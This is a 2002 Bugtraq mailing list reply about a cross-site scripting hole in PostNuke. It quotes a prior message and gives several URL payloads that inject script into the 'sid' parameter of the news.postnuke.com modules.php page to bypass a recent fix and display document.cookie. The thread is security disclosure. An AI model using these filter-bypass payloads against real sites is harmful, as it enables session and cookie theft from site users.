Bugtraq: Re: Postnuke XSS fixed

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: Postnuke XSS fixed

From: Sebastian Konstanty Zdrojewski <s.zdrojewski () not2you com>
Date: Thu, 03 Oct 2002 09:10:23 +0200

I saw the problem has been solved, and the get you proposed below are no
more working. But if you use the following get, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get

?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>

Best Regars,

Sebastian

Daniel Woods wrote:

 >Humm!
 >
 >
 >
 >
 >Not so fast on the praise :(
 >
 >It only took me a couple of workarounds to find ways to bypass the check.
 >
 >  http://news.postnuke.com/modules.php
 >   
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
 >
 >Using the request...
 >   
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
 >gives me the DB Error: message
 >
 >And using the request...
 >   
?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
 >gives me the Alert Popup and DB Error: message...  the '+' is treated
as a blank.
 >
 >Thanks... Dan.
 >
 >
 >

--
Sebastian Konstanty Zdrojewski
IT Analyst

Neticon a brand of Every Level S.r.l.
Via Valtellina 16 - 20159 Milano - MI - Italy

Phone    (+39) 02.68.80.731
E-Mail   s.zdrojewski () neticon it
Website  http://www.neticon.it

By Date By Thread

Current thread:

Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 02)
- Re: Postnuke XSS fixed Daniel Woods (Oct 02)
  - Re: Postnuke XSS fixed Sebastian Konstanty Zdrojewski (Oct 03)
- <Possible follow-ups>
- Re: Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 03)
- Re: Postnuke XSS fixed Muhammad Faisal Rauf Danka (Oct 07)